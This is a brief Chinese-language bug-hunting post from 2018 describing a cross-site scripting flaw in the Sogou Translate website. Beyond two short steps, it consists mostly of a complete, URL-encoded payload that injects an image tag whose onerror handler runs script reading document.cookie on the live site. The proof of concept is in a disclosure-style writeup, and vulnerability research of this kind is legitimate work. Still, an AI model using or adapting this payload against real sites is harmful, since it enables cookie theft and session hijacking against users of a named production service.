@1kbfree
2018-11-09T14:40:46.000000Z
字数 195
阅读 995
漏洞挖掘
1、打开Url:http://fanyi.sogou.com/?fr=websearch
2、发现可以解析html
,直接构造payload
:
http://fanyi.sogou.com/?fr=websearch#zh-CHS/en/123%22%3E%3Cimg%2Fsrc%3D'x'%2Fonerror%3Dalert(document.cookie)%3E